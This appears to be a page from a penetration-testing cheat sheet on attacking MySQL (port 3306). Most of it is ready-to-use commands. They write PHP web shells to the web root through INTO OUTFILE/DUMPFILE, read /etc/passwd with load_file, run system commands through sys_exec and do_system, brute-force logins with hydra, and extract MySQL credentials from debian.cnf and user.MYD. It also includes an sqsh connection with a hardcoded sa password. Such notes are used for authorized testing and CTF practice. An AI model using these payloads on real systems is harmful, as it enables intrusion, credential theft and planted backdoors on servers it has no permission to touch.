😛Port 3306 (MYSQL)

shell

If we have MYSQL Shell via sqlmap or phpmyadmin, we can use mysql outfile/ dumpfile function to upload a shell.

echo -n "<?php phpinfo(); ?>" | xxd -ps 3c3f70687020706870696e666f28293b203f3e

select 0x3c3f70687020706870696e666f28293b203f3e into outfile "/var/www/html/blogblog/wp-content/uploads/phpinfo.php"

SELECT "<?php passthru($_GET['cmd']); ?>" into dumpfile '/var/www/html/shell.php';

tips

 select sys_exec('/bin/bash');
 bash -p or sudo su

sqsh:

sqsh program: apt-get install sqsh freetds-bin freetds-common freetds-dev
usage:
add to the bottom of freetds.conf:
[hostname] host = 192.168.168.169
port = 2600
tds version = 8.0
edit ~/.sqshrc:
\set username=sa
\set password=password
\set style=vert
connect: sqsh -S hostname

sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G

file inclusion

If you have sql-shell from sqlmap/ phpmyadmin, we can read files by using the load_file function.

select load_file('/etc/passwd');

nmap nse

mysql-audit.nse
mysql-brute.nse
mysql-databases.nse
mysql-dump-hashes.nse
mysql-empty-password.nse
mysql-enum.nse
mysql-info.nse
mysql-query.nse
mysql-users.nse
mysql-variables.nse
mysql-vuln-cve2012-2122.nse

Brute force

hydra -L <USERS_LIST> -P <PASSWORDS_LIST> <IP> mysql -vV -I -u

Extracting MySQL credentials from files

cat /etc/mysql/debian.cnf
grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

Connect

# Local
mysql -u <USER>
mysql -u <USER> -p

# Remote
mysql -h <IP> -u <USER>

MySQL commands

show databases;
use <DATABASES>;

show tables;
describe <TABLE>;

select * from <TABLE>;

# Try to execute code
select do_system('id');
\! sh

# Read & Write
select load_file('<FILE>');
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE '<OUT_FILE>'

Manual exploit

Cheatsheet :
	- https://www.asafety.fr/mysql-injection-cheat-sheet/

PreviousPort 111-2049 (RPC/NFS)NextPort 5432 (PostgreSQL)

Last updated 1 year ago

hashtagshell

hashtagtips

hashtagsqsh:

hashtagfile inclusion

hashtagnmap nse

hashtagBrute force

hashtagExtracting MySQL credentials from files

hashtagConnect

hashtagMySQL commands

hashtagManual exploit